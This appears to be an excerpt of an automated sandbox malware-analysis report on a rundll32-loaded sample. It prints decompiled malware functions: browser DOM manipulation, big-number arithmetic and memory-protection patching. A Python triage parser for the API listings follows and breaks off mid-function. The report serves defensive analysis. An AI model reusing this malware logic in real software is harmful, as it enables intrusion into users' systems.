                                                          				intOrPtr* _t58;
                                                          				intOrPtr* _t60;
                                                          				void* _t61;
                                                          				intOrPtr* _t63;
                                                          				intOrPtr* _t65;
                                                          				intOrPtr* _t67;
                                                          				intOrPtr* _t69;
                                                          				intOrPtr* _t71;
                                                          				intOrPtr* _t74;
                                                          				intOrPtr* _t76;
                                                          				intOrPtr _t78;
                                                          				intOrPtr* _t82;
                                                          				intOrPtr* _t86;
                                                          				intOrPtr _t102;
                                                          				intOrPtr _t108;
                                                          				void* _t117;
                                                          				void* _t121;
                                                          				void* _t122;
                                                          				intOrPtr _t129;
                                                          
                                                          				_t122 = _t121 - 0x3c;
                                                          				_push( &_v8);
                                                          				_push(__eax);
                                                           				_t117 =  *((intOrPtr*)( *__eax + 0x48))(); // vtable slot 18: matches IWebBrowser2::get_Document, IDispatch* returned in _v8
                                                          				if(_t117 >= 0) {
                                                          					_t54 = _v8;
                                                          					_t102 =  *0xe5a2d4; // 0x435d5a8
                                                           					_t5 = _t102 + 0xe5b038; // 0x3050f485 = Data1 of IID_IHTMLDocument3
                                                           					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32); // slot 0: QueryInterface(IID_IHTMLDocument3, &_v32)
                                                          					_t56 = _v8;
                                                           					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56); // slot 2: Release() on the document IDispatch
                                                          					if(_t117 >= 0) {
                                                           						__imp__#2(0xe592b0); // OLEAUT32 ordinal 2 = SysAllocString: BSTR tag name for the element lookup below
                                                          						_v28 = _t57;
                                                          						if(_t57 == 0) {
                                                           							_t117 = 0x8007000e; // E_OUTOFMEMORY
                                                          						} else {
                                                          							_t60 = _v32;
                                                           							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24); // slot 47: IHTMLDocument3::getElementsByTagName(tag, &collection)
                                                           							_t86 = __imp__#6; // OLEAUT32 ordinal 6 = SysFreeString
                                                          							_t117 = _t61;
                                                          							if(_t117 >= 0) {
                                                          								_t63 = _v24;
                                                           								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20); // slot 9: IHTMLElementCollection::get_length(&_v20)
                                                          								if(_t117 >= 0) {
                                                          									_t129 = _v20;
                                                          									if(_t129 != 0) {
                                                           										_v64 = 3; // VT_I4: vt field of the first VARIANT argument to item() below
                                                           										_v48 = 3; // VT_I4: vt field of the second VARIANT argument
                                                           										_v56 = 0;
                                                           										_v40 = 0; // running element index, incremented at the bottom of the loop
                                                          										if(_t129 > 0) {
                                                          											while(1) {
                                                          												_t67 = _v24;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												_t122 = _t122;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                           												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8); // slot 11: IHTMLElementCollection::item(name, index, &_v8); the movsd copies above push the two VARIANTs
                                                          												if(_t117 < 0) {
                                                          													goto L16;
                                                          												}
                                                          												_t69 = _v8;
                                                          												_t108 =  *0xe5a2d4; // 0x435d5a8
                                                           												_t28 = _t108 + 0xe5b0bc; // 0x3050f1ff = Data1 of IID_IHTMLElement
                                                           												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16); // QueryInterface(IID_IHTMLElement, &_v16)
                                                          												if(_t117 >= 0) {
                                                          													_t74 = _v16;
                                                           													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12); // slot 13: IHTMLElement::get_id(&_v12)
                                                          													if(_t117 >= 0 && _v12 != 0) {
                                                          														_t78 =  *0xe5a2d4; // 0x435d5a8
                                                           														_t33 = _t78 + 0xe5b078; // 0x76006f = UTF-16LE "ov": start of the element id being searched for
                                                           														if(lstrcmpW(_v12, _t33) == 0) { // id matches exactly (case-sensitive)
                                                          															_t82 = _v16;
                                                           															 *((intOrPtr*)( *_t82 + 0x114))(_t82); // slot 69 of the IHTMLElement vtable, invoked only on the element whose id matched
                                                          														}
                                                           														 *_t86(_v12); // SysFreeString(id)
                                                          													}
                                                          													_t76 = _v16;
                                                          													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                                          												}
                                                          												_t71 = _v8;
                                                          												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                          												_v40 = _v40 + 1;
                                                          												if(_v40 < _v20) {
                                                          													continue;
                                                          												}
                                                          												goto L16;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          								L16:
                                                          								_t65 = _v24;
                                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                          							}
                                                          							 *_t86(_v28);
                                                          						}
                                                          						_t58 = _v32;
                                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                          					}
                                                          				}
                                                          				return _t117;
                                                          			}

Instruction addresses for the listing above (the interactive view maps each line to its address): 0x00e5459d to 0x00e5472a

                                                          APIs
                                                          • SysAllocString.OLEAUT32(00E592B0), ref: 00E545E8
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00E546CA
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00E546E3
                                                          • SysFreeString.OLEAUT32(?), ref: 00E54712
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
• Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
• Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
• Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID:
                                                          • API String ID: 1885612795-0
                                                          • Opcode ID: 1401dcd38f7860bd59c0a40b3550e71816f6c4aed94b5c7651b3e36a847bea09
                                                          • Instruction ID: 4667db405993592395f591eb95a3433d677d0129242f3adba012fe3bbfd6e638
                                                          • Opcode Fuzzy Hash: 1401dcd38f7860bd59c0a40b3550e71816f6c4aed94b5c7651b3e36a847bea09
                                                          • Instruction Fuzzy Hash: 2F518EB5D00209EFCB00DFA8C8888AEB7B9FF89309B144995E915FB260D7719D45CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 0557A6C2
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 0557A6D8
                                                          • memset.NTDLL ref: 0557A781
                                                          • memset.NTDLL ref: 0557A797
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: b5667167ed9c916d11d46b6c96adf0d7a495849dc50caa9ab543a56c738a0f6a
                                                          • Instruction ID: 91e6cf7ee0264f48b24b0905ad28b7d2ff5e1b0c613fb8ce26d69f1c1b860f92
                                                          • Opcode Fuzzy Hash: b5667167ed9c916d11d46b6c96adf0d7a495849dc50caa9ab543a56c738a0f6a
                                                          • Instruction Fuzzy Hash: 83416031B0021AABDB10AF68DC44BEE7779FF85710F104569F919A7280EB70AE558B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 85%
                                                          			E00E5472B(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v16;
                                                          				void _v156;
                                                          				void _v428;
                                                          				void* _t55;
                                                          				unsigned int _t56;
                                                          				signed int _t66;
                                                          				signed int _t74;
                                                          				void* _t76;
                                                          				signed int _t79;
                                                          				void* _t81;
                                                          				void* _t92;
                                                          				void* _t96;
                                                          				signed int* _t99;
                                                          				signed int _t101;
                                                          				signed int _t103;
                                                          				void* _t107;
                                                          
                                                          				_t92 = _a12;
                                                          				_t101 = __eax;
                                                          				_t55 = E00E570EC(_a16, _t92);
                                                          				_t79 = _t55;
                                                          				if(_t79 == 0) {
                                                          					L18:
                                                          					return _t55;
                                                          				}
                                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                          				_t81 = 0;
                                                          				_t96 = 0x20;
                                                          				if(_t56 == 0) {
                                                          					L4:
                                                          					_t97 = _t96 - _t81;
                                                          					_v12 = _t96 - _t81;
                                                          					E00E53954(_t79,  &_v428);
                                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00E56136(_t101,  &_v428, _a8, _t96 - _t81);
                                                          					E00E56136(_t79,  &_v156, _a12, _t97);
                                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                                          					_t66 = E00E53954(_t101,  &E00E5A188);
                                                          					_t103 = _t101 - _t79;
                                                          					_a8 = _t103;
                                                          					if(_t103 < 0) {
                                                          						L17:
                                                          						E00E53954(_a16, _a4);
                                                          						E00E52E9B(_t79,  &_v428, _a4, _t97);
                                                          						memset( &_v428, 0, 0x10c);
                                                          						_t55 = memset( &_v156, 0, 0x84);
                                                          						goto L18;
                                                          					}
                                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                                          					do {
                                                          						if(_v8 != 0xffffffff) {
                                                          							_push(1);
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push( *_t99);
                                                          							L00E57DDC();
                                                          							_t74 = _t66 +  *(_t99 - 4);
                                                          							asm("adc edx, esi");
                                                          							_push(0);
                                                          							_push(_v8 + 1);
                                                          							_push(_t92);
                                                          							_push(_t74);
                                                          							L00E57DD6();
                                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                          								_t74 = _t74 | 0xffffffff;
                                                          								_v16 = _v16 & 0x00000000;
                                                          							}
                                                          						} else {
                                                          							_t74 =  *_t99;
                                                          						}
                                                          						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                                          						_a12 = _t74;
                                                          						_t76 = E00E521FA(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                                          						while(1) {
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							L13:
                                                          							_t92 =  &_v156;
                                                          							if(E00E55C5B(_t79, _t92, _t106) < 0) {
                                                          								break;
                                                          							}
                                                          							L14:
                                                          							_a12 = _a12 + 1;
                                                          							_t76 = E00E5584E(_t79,  &_v156, _t106, _t106);
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							goto L13;
                                                          						}
                                                          						_a8 = _a8 - 1;
                                                          						_t66 = _a12;
                                                          						_t99 = _t99 - 4;
                                                          						 *(_a8 * 4 +  &E00E5A188) = _t66;
                                                          					} while (_a8 >= 0);
                                                          					_t97 = _v12;
                                                          					goto L17;
                                                          				}
                                                          				while(_t81 < _t96) {
                                                          					_t81 = _t81 + 1;
                                                          					_t56 = _t56 >> 1;
                                                          					if(_t56 != 0) {
                                                          						continue;
                                                          					}
                                                          					goto L4;
                                                          				}
                                                          				goto L4;
                                                          			}

Instruction address column of the preceding listing E00E5472B (one address per line of code, detached during extraction): 0x00e5472e 0x00e5473a 0x00e54740 0x00e54745 0x00e54749 0x00e548bb 0x00e548bf 0x00e548bf 0x00e5474f 0x00e54753 0x00e54759 0x00e5475a 0x00e54765 0x00e5476b 0x00e54770 0x00e54773 0x00e5478d 0x00e5479c 0x00e547a8 0x00e547b2 0x00e547b7 0x00e547b9 0x00e547bc 0x00e54873 0x00e54879 0x00e5488a 0x00e5489d 0x00e548b3 0x00000000 0x00e548b8 0x00e547c5 0x00e547cc 0x00e547d0 0x00e547d6 0x00e547d8 0x00e547da 0x00e547dc 0x00e547de 0x00e547e8 0x00e547ed 0x00e547ef 0x00e547f1 0x00e547f2 0x00e547f3 0x00e547f4 0x00e547fb 0x00e54802 0x00e54805 0x00e54805 0x00e547d2 0x00e547d2 0x00e547d2 0x00e5480d 0x00e54815 0x00e54821 0x00e54826 0x00e54826 0x00e5482b 0x00000000 0x00000000 0x00e5482d 0x00e54830 0x00e5483d 0x00000000 0x00000000 0x00e5483f 0x00e5483f 0x00e5484c 0x00e54826 0x00e5482b 0x00000000 0x00000000 0x00000000 0x00e5482b 0x00e54856 0x00e54859 0x00e5485c 0x00e54863 0x00e54863 0x00e54870 0x00000000 0x00e54870 0x00e5475c 0x00e54760 0x00e54761 0x00e54763 0x00000000 0x00000000 0x00000000 0x00e54763 0x00000000

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00E547DE
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00E547F4
                                                          • memset.NTDLL ref: 00E5489D
                                                          • memset.NTDLL ref: 00E548B3
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
• Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
• Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
• Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: 41b2a0bcb69ceb65d0f3a4fbe84ad08320b2b65d4ffdb1e01b01ff8a7a209b9b
                                                          • Instruction ID: 2845cb702d38c54f334500b0727b21660ab83e287dbd18a7f61b7b89fbbfd1f0
                                                          • Opcode Fuzzy Hash: 41b2a0bcb69ceb65d0f3a4fbe84ad08320b2b65d4ffdb1e01b01ff8a7a209b9b
                                                          • Instruction Fuzzy Hash: 2A410172A00209AFDB10DF68CC41BEE77B4EF46315F005969BD09B7281EB709E888B80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCommandLineA.KERNEL32 ref: 0557AB95
                                                          • StrChrA.SHLWAPI(00000000,00000020), ref: 0557ABA6
                                                            • Part of subcall function 05586403: lstrlen.KERNEL32(0559B072,059BB184,0559B072,00000000,05591D0C), ref: 0558640C
                                                            • Part of subcall function 05586403: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 0558642F
                                                            • Part of subcall function 05586403: memset.NTDLL ref: 0558643E
                                                          • ExitProcess.KERNEL32 ref: 0557ACF4
                                                            • Part of subcall function 0557D01E: StrChrA.SHLWAPI(00000000,05572A10,7748D3B0,059BB17C,00000000,?,055771D1,05572A10,00000020,059BB17C,?,?,?,?,?,05572A10), ref: 0557D043
                                                            • Part of subcall function 0557D01E: StrTrimA.SHLWAPI(00000000,0559847C,00000000,?,055771D1,05572A10,00000020,059BB17C,?,?,?,?,?,05572A10), ref: 0557D062
                                                            • Part of subcall function 0557D01E: StrChrA.SHLWAPI(00000000,05572A10,?,055771D1,05572A10,00000020,059BB17C,?,?,?,?,?,05572A10), ref: 0557D06E
                                                          • lstrcmp.KERNEL32(-0000000C,?), ref: 0557AC12
                                                            • Part of subcall function 05581577: FindFirstFileW.KERNEL32(?,?,?,?), ref: 05581603
                                                            • Part of subcall function 05581577: lstrlenW.KERNEL32(?), ref: 0558161F
                                                            • Part of subcall function 05581577: lstrlenW.KERNEL32(?), ref: 05581637
                                                            • Part of subcall function 05581577: lstrcpyW.KERNEL32(00000000,?), ref: 05581650
                                                            • Part of subcall function 05581577: lstrcpyW.KERNEL32(00000002), ref: 05581665
                                                            • Part of subcall function 05581577: FindNextFileW.KERNEL32(?,00000010), ref: 0558168D
                                                            • Part of subcall function 05581577: FindClose.KERNEL32(00000002), ref: 0558169B
                                                            • Part of subcall function 05581577: FreeLibrary.KERNEL32(?), ref: 055816AD
                                                            • Part of subcall function 0558C07A: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0558C09D
                                                            • Part of subcall function 0558C07A: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000000E,?,?,0557AC52,?), ref: 0558C0DE
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Findlstrlen$FileFreeHeaplstrcpy$AllocateCloseCommandExitFirstLibraryLineNextProcessTrimlstrcmpmemcpymemset
                                                          • String ID:
                                                          • API String ID: 2123058440-0
                                                          • Opcode ID: 738c42eaa723a0b3d7fdf12a023255665981e11a0595f3f54a7f700bb6e1a369
                                                          • Instruction ID: 268e36daed9136502d5d7b2f20ffb4129cf0c9df7b4ca708e25bd13125d54ba9
                                                          • Opcode Fuzzy Hash: 738c42eaa723a0b3d7fdf12a023255665981e11a0595f3f54a7f700bb6e1a369
                                                          • Instruction Fuzzy Hash: 2A416D7161820ABFD710EF61E889C2FBBEEFB84250F08482DF556D2150EB35D9099B52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 0557ADA7
                                                          • GetLastError.KERNEL32 ref: 0557ADC7
                                                            • Part of subcall function 05588A11: wcstombs.NTDLL ref: 05588ACF
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastObjectSingleWaitwcstombs
                                                          • String ID:
                                                          • API String ID: 2344289193-0
                                                          • Opcode ID: a62c804a68f00412cbbec37ee25d077b58fb4b7dc11ac51b59ebbd673ba2cc7b
                                                          • Instruction ID: 9c8089c415492ae18b9073183b02f0f4c20374815ef0df93bd49256fc5d99904
                                                          • Opcode Fuzzy Hash: a62c804a68f00412cbbec37ee25d077b58fb4b7dc11ac51b59ebbd673ba2cc7b
                                                          • Instruction Fuzzy Hash: 21413C7190421DEFDF20DFA5E9849BEBBBAFF44346F50446AE402E7250EB349A44DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 05592B55: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0558381A,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,0558D9B6), ref: 05592B61
                                                            • Part of subcall function 05592B55: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0558381A,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 05592BBF
                                                            • Part of subcall function 05592B55: lstrcpy.KERNEL32(00000000,00000000), ref: 05592BCF
                                                          • lstrlen.KERNEL32(?,00000000,00000000,00000004,00000000,?), ref: 05583C25
                                                          • wsprintfA.USER32 ref: 05583C55
                                                          • GetLastError.KERNEL32 ref: 05583CCA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$ErrorLastlstrcpymemcpywsprintf
                                                          • String ID: `
                                                          • API String ID: 324226357-1850852036
                                                          • Opcode ID: 1018ae7aba8b9650640a75f81d63ebb28a9e17e32eda83c2529d89160c949f40
                                                          • Instruction ID: 717b38b549ac9c64f00dacc777bb729a01e2332402451d242e73ed22e2fcfe5b
                                                          • Opcode Fuzzy Hash: 1018ae7aba8b9650640a75f81d63ebb28a9e17e32eda83c2529d89160c949f40
                                                          • Instruction Fuzzy Hash: 9F31037120020AAFDF11EF65DC89FAB3BB9FF44350F21442AF906A6150EB75E918CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0558118B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000), ref: 05581199
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0557C19B
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0557C1EA
                                                            • Part of subcall function 0558C45A: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,05593D7C), ref: 0558C49B
                                                            • Part of subcall function 0558C45A: GetLastError.KERNEL32 ref: 0558C4A5
                                                            • Part of subcall function 0558C45A: WaitForSingleObject.KERNEL32(000000C8), ref: 0558C4CA
                                                            • Part of subcall function 0558C45A: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 0558C4EB
                                                            • Part of subcall function 0558C45A: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 0558C513
                                                            • Part of subcall function 0558C45A: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 0558C528
                                                            • Part of subcall function 0558C45A: SetEndOfFile.KERNEL32(00000006), ref: 0558C535
                                                            • Part of subcall function 0558C45A: CloseHandle.KERNEL32(00000006), ref: 0558C54D
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,00000101,?,?,?,05573B1E,?,?,?,?,?,00000000), ref: 0557C21F
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,05573B1E,?,?,?,?,?,00000000,?,00000000,?,0557316A), ref: 0557C22F
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                                                          • String ID:
                                                          • API String ID: 4200334623-0
                                                          • Opcode ID: aef79b6da919b342c759c962bf777299656ec97d13acc6eb458b81502cd7ae0b
                                                          • Instruction ID: 055ccf3e3f850fcce125bd23254ea65764e0a302bdcce1f717a8f65de946f6ad
                                                          • Opcode Fuzzy Hash: aef79b6da919b342c759c962bf777299656ec97d13acc6eb458b81502cd7ae0b
                                                          • Instruction Fuzzy Hash: A2313772510019FFEB109FA5EC8ACAEBF7DFB08250B124066F505D3150DB75AE55EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 055834FF
                                                          • memcpy.NTDLL(00000018,?,?), ref: 05583528
                                                          • RegisterWaitForSingleObject.KERNEL32(00000010,?,0558E968,00000000,000000FF,00000008), ref: 05583567
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0558357A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                                                          • String ID:
                                                          • API String ID: 2780211928-0
                                                          • Opcode ID: 735aebe96205663e89e61a7dd59508fa3a818d478137fa784a3c3b28c28b7bf8
                                                          • Instruction ID: dac8739b23c0f97587dcaf985e58697fde8e0f9b776731c2c7ec92345244b48c
                                                          • Opcode Fuzzy Hash: 735aebe96205663e89e61a7dd59508fa3a818d478137fa784a3c3b28c28b7bf8
                                                          • Instruction Fuzzy Hash: 89317170200205AFDB209F29EC46EAA7FB9FF09721F01451AF915D72A0DB74E919DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • TlsGetValue.KERNEL32(?), ref: 055788E3
                                                          • SetEvent.KERNEL32(?), ref: 0557892D
                                                          • TlsSetValue.KERNEL32(00000001), ref: 05578967
                                                          • TlsSetValue.KERNEL32(00000000), ref: 05578983
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Value$Event
                                                          • String ID:
                                                          • API String ID: 3803239005-0
                                                          • Opcode ID: 6cc26e76c4ca78a947ac572b37973f4bddf404b72a072dfd6d5c02eb2420ffce
                                                          • Instruction ID: e4866fb292cac5e463ec7796a7d6e25bf4ae4e6142423437ed2e6982db5aae62
                                                          • Opcode Fuzzy Hash: 6cc26e76c4ca78a947ac572b37973f4bddf404b72a072dfd6d5c02eb2420ffce
                                                          • Instruction Fuzzy Hash: B821E031204209AFCF219F18EC8ED6ABBB3FF41320B050425F446CA2A0D731EC95EB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,?,?,?), ref: 0557A583
                                                          • VirtualProtect.KERNEL32(?,00000004,?,?,?,?), ref: 0557A5B3
                                                          • RtlEnterCriticalSection.NTDLL(0559C300), ref: 0557A5C2
                                                          • RtlLeaveCriticalSection.NTDLL(0559C300), ref: 0557A5E0
                                                          • GetLastError.KERNEL32(?,?), ref: 0557A5F0
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                                          • String ID:
                                                          • API String ID: 653387826-0
                                                          • Opcode ID: 191cfa6ac19d436239a851b9d7d00aaf792c8c78561dfe8c5671790f7e5d8692
                                                          • Instruction ID: 662655bebcb7d26644ab88a672d714f67ddaa1d3fa8b8642ee2b5f5d42cffd12
                                                          • Opcode Fuzzy Hash: 191cfa6ac19d436239a851b9d7d00aaf792c8c78561dfe8c5671790f7e5d8692
                                                          • Instruction Fuzzy Hash: A73148B6600709EFDB10CFA8ED95A9ABBF8FB09200B414519E5A6D3710EB30E904DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
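
The block above is the report's clearest memory-patching primitive: VirtualProtect on a 4-byte region with flNewProtect 0x40 (PAGE_EXECUTE_READWRITE), a second VirtualProtect whose new-protect argument is not a constant (apparently restoring the saved protection), both bracketed by a critical section and followed by GetLastError. Listings in this format run to thousands of entries, so the following Python triage helper parses the report's "APIs" entries and flags calls that make a page executable and writable. It is an added example, not part of the Joe Sandbox report or of the sample's code; the entries in SAMPLE are copied from two function blocks on this page, and the parser assumes the bullet / "ref:" line layout used here.

```python
"""Triage helper for Joe Sandbox 'APIs' listings (added example, not from the report).

Parses entries of the form
    • VirtualProtect.KERNEL32(?,00000004,00000040,?,?,?), ref: 0557A583
      • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
    • memset.NTDLL ref: 05592521
and flags VirtualProtect calls whose new protection is executable + writable.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Win32 page protections from winnt.h; only the two we flag.
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80

_CALL_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[#\w]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"          # argument list is absent for some entries
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class Call:
    api: str
    module: str
    args: List[Optional[int]]      # None where the listing shows '?'
    ref: int                       # address of the call site
    subcall_of: Optional[int]      # address of the callee when the call is indirect

@dataclass
class FunctionApis:
    calls: List[Call] = field(default_factory=list)

    def direct(self) -> List[Call]:
        return [c for c in self.calls if c.subcall_of is None]

    def api_set(self) -> Tuple[str, ...]:
        """Sorted unique direct API names: a crude fingerprint for pivoting between dumps."""
        return tuple(sorted({c.api for c in self.direct()}))

def _parse_args(text: Optional[str]) -> List[Optional[int]]:
    if text is None or text.strip() == "":
        return []
    out: List[Optional[int]] = []
    for tok in text.split(","):
        tok = tok.strip()
        out.append(None if tok == "?" else int(tok, 16))   # '-00000008' style negatives parse too
    return out

def parse_api_blocks(text: str) -> List[FunctionApis]:
    """One FunctionApis per 'APIs' heading; a block ends at 'Memory Dump Source'."""
    blocks: List[FunctionApis] = []
    current: Optional[FunctionApis] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionApis()
            blocks.append(current)
            continue
        if stripped == "Memory Dump Source":
            current = None
            continue
        if current is None:
            continue
        m = _CALL_RE.match(line)
        if not m:
            continue
        current.calls.append(Call(
            api=m["api"], module=m["mod"], args=_parse_args(m["args"]),
            ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None,
        ))
    return blocks

def flag_rwx_protect(blocks: List[FunctionApis]) -> List[Tuple[int, int, int]]:
    """(call site, dwSize, flNewProtect) for direct VirtualProtect calls that request RWX.
    VirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldProtect): flNewProtect is argument 3."""
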